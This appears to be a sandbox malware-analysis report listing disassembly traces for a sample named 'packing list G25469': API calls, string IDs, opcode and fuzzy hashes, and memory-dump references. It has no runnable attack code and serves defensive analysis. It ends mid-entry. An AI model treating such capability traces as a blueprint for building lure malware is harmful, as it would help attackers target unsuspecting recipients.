                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                  • API String ID: 3964851224-909552448
                                                  • Opcode ID: bcb3a05e1ac2b2790cfee7270c0ec57d2da3e69e470ffdf11c70645c2e81ea7c
                                                  • Instruction ID: ef47038bab9b2ebfb300e1ebc4a245b9998fd7718a63b31cf31f484d7d0d0773
                                                  • Opcode Fuzzy Hash: bcb3a05e1ac2b2790cfee7270c0ec57d2da3e69e470ffdf11c70645c2e81ea7c
                                                  • Instruction Fuzzy Hash: 1D414F3151028A9BDF00EF15D891AEA37E5FF22744F1044F4EC652B296EB70DE4ADB51
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BA36F4,00000010,?,Bad directive syntax error,00BCDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B725D6
                                                  • LoadStringW.USER32(00000000,?,00BA36F4,00000010), ref: 00B725DD
                                                  • _wprintf.LIBCMT ref: 00B72610
                                                  • __swprintf.LIBCMT ref: 00B72632
                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B726A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                  • API String ID: 1080873982-4153970271
                                                  • Opcode ID: 5cd63b41a73c7abc718001d5e604c8d464ea029fd1fc21ed64cc91bd39667fed
                                                  • Instruction ID: d0687cfb491b019b2174820aed653173a48be6b0412a14bf4c4bfd8bdee04450
                                                  • Opcode Fuzzy Hash: 5cd63b41a73c7abc718001d5e604c8d464ea029fd1fc21ed64cc91bd39667fed
                                                  • Instruction Fuzzy Hash: BB212D7180021AAFCF11AB90CC4AFEE7BF9BF18704F0444D9F515760A2EB75A618DB50
                                                  APIs
                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B77B42
                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B77B58
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B77B69
                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B77B7B
                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B77B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: SendString
                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                  • API String ID: 890592661-1007645807
                                                  • Opcode ID: 8dbc2bc4d40dbf5e8d669d4b251f722ec112c9fa801a5eb1643b19f98d4f56cd
                                                  • Instruction ID: 432be22ba49f64b0565cbe4553efb2d6e9b6aadb34cb6677784e4a8aa653519f
                                                  • Opcode Fuzzy Hash: 8dbc2bc4d40dbf5e8d669d4b251f722ec112c9fa801a5eb1643b19f98d4f56cd
                                                  • Instruction Fuzzy Hash: CF1160A169029979D720A7A2CC5ADFF7AFCEB95F10F1005D97415B30D1EE701E45C6A0
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00B77794
                                                    • Part of subcall function 00B4DC38: timeGetTime.WINMM(?,75A8B400,00BA58AB), ref: 00B4DC3C
                                                  • Sleep.KERNEL32(0000000A), ref: 00B777C0
                                                  • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00B777E4
                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00B77806
                                                  • SetActiveWindow.USER32 ref: 00B77825
                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B77833
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B77852
                                                  • Sleep.KERNEL32(000000FA), ref: 00B7785D
                                                  • IsWindow.USER32 ref: 00B77869
                                                  • EndDialog.USER32(00000000), ref: 00B7787A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                  • String ID: BUTTON
                                                  • API String ID: 1194449130-3405671355
                                                  • Opcode ID: 44566f170d42bf18c319abb3c8aff2cc030b7b1712a9d4b2614b7e5a4e2c34ec
                                                  • Instruction ID: 2b869c618ee92a1d8ecef9942f6e1eff85544f29769e796d5769970ae8b4ebd1
                                                  • Opcode Fuzzy Hash: 44566f170d42bf18c319abb3c8aff2cc030b7b1712a9d4b2614b7e5a4e2c34ec
                                                  • Instruction Fuzzy Hash: F7214FB0254205AFE7159B35EC89B363FE9FB44B48B0081A4F52A93176DFB55D00DA25
                                                  APIs
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • CoInitialize.OLE32(00000000), ref: 00B8034B
                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B803DE
                                                  • SHGetDesktopFolder.SHELL32(?), ref: 00B803F2
                                                  • CoCreateInstance.OLE32(00BBDA8C,00000000,00000001,00BE3CF8,?), ref: 00B8043E
                                                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B804AD
                                                  • CoTaskMemFree.OLE32(?,?), ref: 00B80505
                                                  • _memset.LIBCMT ref: 00B80542
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00B8057E
                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B805A1
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00B805A8
                                                  • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B805DF
                                                  • CoUninitialize.OLE32(00000001,00000000), ref: 00B805E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                  • String ID:
                                                  • API String ID: 1246142700-0
                                                  • Opcode ID: 2a66bb46d9aa6a2f6153cdd3240d26406254d1719c1b48870ead287426673597
                                                  • Instruction ID: d6e53e605d2eadb4fdd4f92a95136c0b7434c038ca05df5934cfbbda97a6eeaa
                                                  • Opcode Fuzzy Hash: 2a66bb46d9aa6a2f6153cdd3240d26406254d1719c1b48870ead287426673597
                                                  • Instruction Fuzzy Hash: F5B1DA75A00109AFDB04EFA4C888DAEBBF9EF48344F1484A9F805EB261DB74ED45CB50
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00B72ED6
                                                  • SetKeyboardState.USER32(?), ref: 00B72F41
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B72F61
                                                  • GetKeyState.USER32(000000A0), ref: 00B72F78
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B72FA7
                                                  • GetKeyState.USER32(000000A1), ref: 00B72FB8
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B72FE4
                                                  • GetKeyState.USER32(00000011), ref: 00B72FF2
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B7301B
                                                  • GetKeyState.USER32(00000012), ref: 00B73029
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B73052
                                                  • GetKeyState.USER32(0000005B), ref: 00B73060
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: f7ee741133f630b99cdd35c7b0bc832d9b80aa7c0527310910fbdcbdd4a88db3
                                                  • Instruction ID: 9a24c5e90deb9939c80f9f731af94c55895dd8005c434c164be40c95dabef98f
                                                  • Opcode Fuzzy Hash: f7ee741133f630b99cdd35c7b0bc832d9b80aa7c0527310910fbdcbdd4a88db3
                                                  • Instruction Fuzzy Hash: 4751E82490878429FB35EBA48811BEABFF4DF11740F08C5DDC5DA5A1C2DB549B8CC762
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000001), ref: 00B6ED1E
                                                  • GetWindowRect.USER32(00000000,?), ref: 00B6ED30
                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B6ED8E
                                                  • GetDlgItem.USER32(?,00000002), ref: 00B6ED99
                                                  • GetWindowRect.USER32(00000000,?), ref: 00B6EDAB
                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B6EE01
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00B6EE0F
                                                  • GetWindowRect.USER32(00000000,?), ref: 00B6EE20
                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B6EE63
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00B6EE71
                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B6EE8E
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B6EE9B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                  • String ID:
                                                  • API String ID: 3096461208-0
                                                  • Opcode ID: bcdb48d4f050b2d0de2a751b0b5bbf0f013c620d32db4f8aac93397086266102
                                                  • Instruction ID: 472f95176d36c9d99aaddfe2d788a9731a4ec3c1e1d090d1f4dc67e63f93b261
                                                  • Opcode Fuzzy Hash: bcdb48d4f050b2d0de2a751b0b5bbf0f013c620d32db4f8aac93397086266102
                                                  • Instruction Fuzzy Hash: AE512375B00205AFDB18CF68CD95AAEBBB5EB88700F14866DF51AD7290EBB4DD048B10
                                                  APIs
                                                    • Part of subcall function 00B4B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B4B759,?,00000000,?,?,?,?,00B4B72B,00000000,?), ref: 00B4BA58
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B4B72B), ref: 00B4B7F6
                                                  • KillTimer.USER32(00000000,?,00000000,?,?,?,?,00B4B72B,00000000,?,?,00B4B2EF,?,?), ref: 00B4B88D
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00BAD8A6
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B4B72B,00000000,?,?,00B4B2EF,?,?), ref: 00BAD8D7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B4B72B,00000000,?,?,00B4B2EF,?,?), ref: 00BAD8EE
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00B4B72B,00000000,?,?,00B4B2EF,?,?), ref: 00BAD90A
                                                  • DeleteObject.GDI32(00000000), ref: 00BAD91C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID:
                                                  • API String ID: 641708696-0
                                                  • Opcode ID: 033e6fc550511b64faf62ba6cb2730c66d16cd8a3f41597e21a84440390dbf73
                                                  • Instruction ID: 32a8872456d7424a99a3f58edb8f43f37d4a292b7c97adcefe33637337ff2260
                                                  • Opcode Fuzzy Hash: 033e6fc550511b64faf62ba6cb2730c66d16cd8a3f41597e21a84440390dbf73
                                                  • Instruction Fuzzy Hash: B6616830505601EFDB259F19D988B36B7F5FF96322F14099DE28687A70CB74E990EB80
                                                  APIs
                                                    • Part of subcall function 00B4B526: GetWindowLongW.USER32(?,000000EB), ref: 00B4B537
                                                  • GetSysColor.USER32(0000000F), ref: 00B4B438
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ColorLongWindow
                                                  • String ID:
                                                  • API String ID: 259745315-0
                                                  • Opcode ID: f03c598aca7a8efe8fb7858d39a58b037aa2e5ece098bc35e69c2598e00dc402
                                                  • Instruction ID: 63210c402c9292bf5728ec895fe24eb0bb0d5660491c7f7c188e9ad7bd2df079
                                                  • Opcode Fuzzy Hash: f03c598aca7a8efe8fb7858d39a58b037aa2e5ece098bc35e69c2598e00dc402
                                                  • Instruction Fuzzy Hash: E741A034000140AFDF205F289889FB93BA5EB06731F1447A1FA659B2E6DB74CE41EB21
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                  • String ID:
                                                  • API String ID: 136442275-0
                                                  • Opcode ID: 4b952292b810f701b7187543ffe2c48d3787a4d5b822dc7c1c4fd2ba7ff16f5c
                                                  • Instruction ID: 7ab1b35c16561ee094d9b5206ee9316972d1e2e0b1c2a2845888bb729de9b174
                                                  • Opcode Fuzzy Hash: 4b952292b810f701b7187543ffe2c48d3787a4d5b822dc7c1c4fd2ba7ff16f5c
                                                  • Instruction Fuzzy Hash: 79410C7685511CAECF65EB94CC85EDA73FCEB44310F0041E6BA59A2051EA30ABE98F54
                                                  APIs
                                                  • CharLowerBuffW.USER32(00BCDC00,00BCDC00,00BCDC00), ref: 00B7D7CE
                                                  • GetDriveTypeW.KERNEL32(?,00BE3A70,00000061), ref: 00B7D898
                                                  • _wcscpy.LIBCMT ref: 00B7D8C2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: 2a89045798cc94ca7b2478da79c9fb29c28704bea46ee119b76e3bdd708eb06f
                                                  • Instruction ID: efb57826ebada14a47359265964803ef31ce28102f9f67974f7c483f33e9c2a3
                                                  • Opcode Fuzzy Hash: 2a89045798cc94ca7b2478da79c9fb29c28704bea46ee119b76e3bdd708eb06f
                                                  • Instruction Fuzzy Hash: 2251B135504240AFC700EF14C8C1A6EB7F5EF84754F20C9ADF9AA572A2EB31EE05DA42
                                                  APIs
                                                  • __swprintf.LIBCMT ref: 00B393AB
                                                  • __itow.LIBCMT ref: 00B393DF
                                                    • Part of subcall function 00B51557: _xtow@16.LIBCMT ref: 00B51578
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf_xtow@16
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 1502193981-2263619337
                                                  • Opcode ID: 5fc90566c4914c579fb0491cf7ed953b980b2f57cec823266df0da0f0547f7ca
                                                  • Instruction ID: 3a0f8efde60d899ba8d3089556a6121c8dc890a12cc59e49f2cb5ed17e998a6d
                                                  • Opcode Fuzzy Hash: 5fc90566c4914c579fb0491cf7ed953b980b2f57cec823266df0da0f0547f7ca
                                                  • Instruction Fuzzy Hash: D541F771504205EBDB24EB78D981F6973E4EF89310F3044EAE449D71C1EBB1EA41CB11
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B9A259
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00B9A260
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B9A273
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00B9A27B
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B9A286
                                                  • DeleteDC.GDI32(00000000), ref: 00B9A28F
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00B9A299
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B9A2AD
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B9A2B9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 2274933c48e3eccdd90095b368ffd934439cfd22abb8d28b9a786694b6234f73
                                                  • Instruction ID: 2dcb089aa20bf8ccecc544d4fa1274ce64162a8fa4ee215094582b942420dc02
                                                  • Opcode Fuzzy Hash: 2274933c48e3eccdd90095b368ffd934439cfd22abb8d28b9a786694b6234f73
                                                  • Instruction Fuzzy Hash: 03317E31100115BFDF119FA4DC49FEA3BA9FF0A760F110368FA19A61A0DB75D811DBA5
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                  • String ID: 0.0.0.0
                                                  • API String ID: 2620052-3771769585
                                                  • Opcode ID: 18c2e3dd9ccc546d1486af028995853724af19edf9953381b50a1de04ad7a402
                                                  • Instruction ID: 94a1b911751b30b20797f5cd5bb1abc4a1aea306db63f2193a4153c1b9e680a8
                                                  • Opcode Fuzzy Hash: 18c2e3dd9ccc546d1486af028995853724af19edf9953381b50a1de04ad7a402
                                                  • Instruction Fuzzy Hash: 2D11D271504115ABCB24AB71AC4AEEA77FCEB40711F0041E5F819AB091FFB49E858A50
                                                  APIs
                                                  • _memset.LIBCMT ref: 00B55047
                                                    • Part of subcall function 00B57C0E: __getptd_noexit.LIBCMT ref: 00B57C0E
                                                  • __gmtime64_s.LIBCMT ref: 00B550E0
                                                  • __gmtime64_s.LIBCMT ref: 00B55116
                                                  • __gmtime64_s.LIBCMT ref: 00B55133
                                                  • __allrem.LIBCMT ref: 00B55189
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B551A5
                                                  • __allrem.LIBCMT ref: 00B551BC
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B551DA
                                                  • __allrem.LIBCMT ref: 00B551F1
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B5520F
                                                  • __invoke_watson.LIBCMT ref: 00B55280
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                  • Instruction ID: 417326e21561f1146adddc29904d7431c3023c3d8d1661d5245d86c898fb192c
